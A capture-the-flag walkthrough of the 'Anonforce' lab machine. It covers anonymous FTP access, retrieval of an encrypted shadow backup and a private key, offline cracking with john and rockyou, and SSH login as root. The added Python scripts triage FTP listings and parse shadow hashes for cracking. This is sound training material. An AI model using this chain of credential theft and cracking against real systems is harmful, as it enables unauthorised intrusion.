Anonforce
Phase 1: Reconnaissance (Information Gathering)
export TARGET_IP=10.10.178.7
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65392 closed tcp ports (reset), 141 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Phase 2: Enumeration and Vulnerability Analysis
Based on the reconnaissance, we focus on the open services to identify potential vulnerabilities.
FTP Enumeration:

Command:
ftp 10.10.178.7 21

Explanation: Connects to the FTP service on port 21 and tests whether the server accepts the "anonymous" account with a blank password.

Interaction and Results (Annotated):
# Connected to 10.10.178.7.
# 220 (vsFTPd 3.0.3) <-- Banner reveals the FTP server software and version.
Name (10.10.178.7:kali): anonymous # Attempting anonymous login.
# 331 Please specify the password.
Password: # BLANK <-- Entering a blank password.
# 230 Login successful. <-- Anonymous login is permitted! This is a major vulnerability.
# Remote system type is UNIX.
# Using binary mode to transfer files.
ftp> help # Displays available FTP commands.
ftp> ls # Lists files in the current directory.
ftp> cd /home/melodias # Navigates to user "melodias" home directory.
ftp> get user.txt # Downloads a file named "user.txt".
ftp> cd /notread # Navigates to the directory named "notread".
ftp> ls # Lists files in the directory:
# -rwxrwxrwx 1 1000 1000 524 Aug 11 2019 backup.pgp
# -rwxrwxrwx 1 1000 1000 3762 Aug 11 2019 private.asc
ftp> get backup.pgp # Downloads both files for offline analysis in Phase 3.
ftp> get private.asc
Analysis:
- Anonymous FTP Access: The most critical finding is that anonymous FTP access is enabled, allowing anyone to connect and browse the exposed directories without credentials.
- Sensitive Files: The backup.pgp and private.asc files are discovered. The .pgp extension suggests an encrypted file (likely produced by PGP or GPG), and the .asc extension usually indicates ASCII-armored key material, here most likely a private key. Together they are exactly the pair needed to decrypt the backup.
- Permissions: Both files are mode -rwxrwxrwx, i.e. world-readable, world-writable and world-executable on the filesystem, so any local account, including the one the FTP daemon runs as, can read or modify them. Whether the anonymous FTP session can actually upload or overwrite files depends on the vsftpd configuration (write_enable and anon_upload_enable), so confirm with a harmless put before assuming write access. Read access alone is already enough for the attack that follows, and the permissive mode is another significant security flaw.
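The triage done by eye above (spot world-writable files and key material in an FTP listing, decide what to pull) can be scripted. The following is an added example, not code from the original writeup: it parses the Unix long-listing format vsftpd returns, flags the "others" write bit and a list of extensions that are an assumption to tune per engagement, and returns what to download, what to test for write access, and where to recurse. The sample listing is constructed; its two middle lines are the ones seen on the target.

```python
"""Triage an FTP long listing before downloading anything (added example)."""
import re
from typing import NamedTuple

# Classic Unix `ls -l` line as returned by vsftpd's LIST command.
LISTING_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\w{3}\s+\d{1,2}\s+[\d:]+\s+(?P<name>.+)$"
)

# Extensions worth pulling on sight (assumption: adjust per engagement).
SENSITIVE_SUFFIXES = (".pgp", ".gpg", ".asc", ".key", ".pem", ".ppk", "id_rsa",
                      ".kdbx", ".bak", ".old", ".sql", ".txt")

# Constructed sample; the backup.pgp and private.asc lines match the target's listing.
SAMPLE_LISTING = """\
drwxr-xr-x    2 0        0            4096 Aug 11  2019 pub
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
-rw-r--r--    1 0        0              33 Aug 11  2019 user.txt
lrwxrwxrwx    1 0        0              11 Aug 11  2019 latest -> backup.pgp
"""


class Entry(NamedTuple):
    name: str
    mode: str
    size: int
    is_dir: bool
    world_writable: bool
    sensitive: bool


def parse_listing(text: str) -> list:
    """Parse every long-listing line; skip 'total N', blanks and server chatter."""
    entries = []
    for raw in text.splitlines():
        m = LISTING_RE.match(raw.strip())
        if not m:
            continue
        mode = m["mode"]
        name = m["name"].split(" -> ", 1)[0]      # drop the symlink target
        entries.append(Entry(
            name=name,
            mode=mode,
            size=int(m["size"]),
            is_dir=mode[0] == "d",
            world_writable=mode[8] == "w",        # 'others' write bit: rwx rwx rWx
            sensitive=name.lower().endswith(SENSITIVE_SUFFIXES),
        ))
    return entries


def triage(text: str) -> dict:
    """Split a listing into files to fetch, files to probe for write access, dirs to recurse."""
    entries = parse_listing(text)
    return {
        "fetch": [e.name for e in entries if e.sensitive and not e.is_dir],
        "writable": [e.name for e in entries if e.world_writable],
        "recurse": [e.name for e in entries if e.is_dir],
    }


if __name__ == "__main__":
    for bucket, names in triage(SAMPLE_LISTING).items():
        print(f"{bucket:9s} {names}")
```

The "writable" bucket only says the filesystem mode permits writes; on vsftpd the anonymous session can still be read-only, so treat those names as candidates to test with a throwaway upload, not as confirmed findings.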
Phase 3: Exploitation
Decrypting the Backup:

Strategy: We have an encrypted file (backup.pgp) and what appears to be a private key (private.asc). We'll import the private key into a local GPG keyring and use it to decrypt the backup.

Steps (Annotated):
gpg --import private.asc # Imports the private key into the local GPG keyring.
# Depending on the GnuPG version, the key's passphrase is requested at import or at first use.
# Passphrase Cracking: private keys are normally protected with a passphrase. If the import
# or the decryption prompts for one we do not know, we crack it offline.
gpg2john private.asc > hash # Converts the protected key into a John the Ripper hash.
# `gpg2john` is a tool from the John the Ripper suite.
john hash --wordlist=/usr/share/wordlists/rockyou.txt # Attempts to crack the passphrase.
# Output: xbox360 (the cracked passphrase; `john --show hash` prints it again later)
gpg --import private.asc # Re-import the key if the first attempt was cancelled; enter "xbox360" when prompted.
gpg --output backup.txt --decrypt backup.pgp # Decrypts backup.pgp into backup.txt.
# Enter "xbox360" again when prompted.
Gaining Root Access:

The decrypted backup.pgp is a copy of /etc/shadow, so it contains the password hash for root (a $6$ sha512crypt hash).

Steps:
# Put the root record into its own file. Single quotes keep the $ characters literal;
# `echo -e` is not needed and would interpret any backslash sequences inside a hash.
echo 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::' > roothash
john roothash --wordlist=/usr/share/wordlists/rockyou.txt # Crack the root hash; john auto-detects sha512crypt (add --format=sha512crypt if it guesses wrong).
# Output: hikari (the cracked password)
ssh root@$TARGET_IP # Connect to the target as root via SSH (the server accepts password authentication for root, so the cracked hash is immediately usable).
# Enter "hikari" as the password.
id # Verify root access. Output should be: uid=0(root) gid=0(root) groups=0(root)
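Before feeding a recovered shadow file to john it pays to know what each record actually is: which accounts are locked, which have no password, which hash algorithm and cost are in use, and how stale the password is. The following is an added example, not code from the original writeup. It parses /etc/shadow records, classifies the crypt(3) hash prefix (md5crypt, sha256crypt, sha512crypt, bcrypt; anything else is reported as unknown), and emits the user:hash lines john expects. The root line in the sample is the one recovered from the target; the daemon and guest lines are constructed.

```python
"""Parse /etc/shadow records from a recovered backup and rate their crackability (added example)."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

EPOCH = date(1970, 1, 1)

# crypt(3) id -> (algorithm name, John the Ripper --format, default cost)
HASH_PREFIXES = {
    "$1$": ("md5crypt", "md5crypt", 1000),
    "$5$": ("sha256crypt", "sha256crypt", 5000),
    "$6$": ("sha512crypt", "sha512crypt", 5000),
}

# The root record is the one recovered from the target; the other two are constructed.
SAMPLE_SHADOW = """\
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17885:0:99999:7:::
guest::18120:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    user: str
    hash: str
    state: str                      # "hashed" | "locked" | "nopassword"
    algorithm: str
    salt: str
    rounds: Optional[int]
    john_format: Optional[str]
    last_change: Optional[date]
    max_days: Optional[int]


def _classify(h: str):
    """Return (state, algorithm, salt, rounds, john_format) for one hash field."""
    if h == "":
        return "nopassword", "none", "", None, None
    if h.startswith(("!", "*")):                  # locked or no-login account
        return "locked", "none", "", None, None
    if h.startswith(("$2a$", "$2b$", "$2y$")):    # $2b$<cost>$<22-char salt><31-char hash>
        cost, rest = h[4:].split("$", 1)
        return "hashed", "bcrypt", rest[:22], 2 ** int(cost), "bcrypt"
    for prefix, (name, jtr, default_rounds) in HASH_PREFIXES.items():
        if h.startswith(prefix):
            parts = h[len(prefix):].split("$")
            rounds = default_rounds
            if parts[0].startswith("rounds="):    # explicit cost, e.g. $6$rounds=65536$salt$hash
                rounds = int(parts[0].split("=", 1)[1])
                parts = parts[1:]
            return "hashed", name, parts[0], rounds, jtr
    return "hashed", "unknown", "", None, None     # yescrypt ($y$), DES, etc.


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"not a shadow record: {line!r}")
    fields += [""] * (9 - len(fields))            # tolerate truncated records
    user, h, lastchg, _min_days, max_days = fields[:5]
    state, algo, salt, rounds, jtr = _classify(h)
    return ShadowEntry(
        user=user, hash=h, state=state, algorithm=algo, salt=salt, rounds=rounds,
        john_format=jtr,
        last_change=EPOCH + timedelta(days=int(lastchg)) if lastchg.isdigit() else None,
        max_days=int(max_days) if max_days.isdigit() else None,
    )


def john_input(entries) -> list:
    """One 'user:hash' line per account that actually has a crackable hash."""
    return [f"{e.user}:{e.hash}" for e in entries if e.state == "hashed"]


if __name__ == "__main__":
    entries = [parse_shadow_line(l) for l in SAMPLE_SHADOW.splitlines()]
    for e in entries:
        print(f"{e.user:8s} {e.state:10s} {e.algorithm:12s} rounds={e.rounds} "
              f"changed={e.last_change} john_format={e.john_format}")
    print("\n".join(john_input(entries)))
```

The root hash carries no rounds= parameter, so it uses the sha512crypt default of 5000 iterations, which is exactly why a rockyou run against it finishes in seconds; the last-change field (18120 days) also dates the password to August 2019, consistent with the file timestamps seen over FTP.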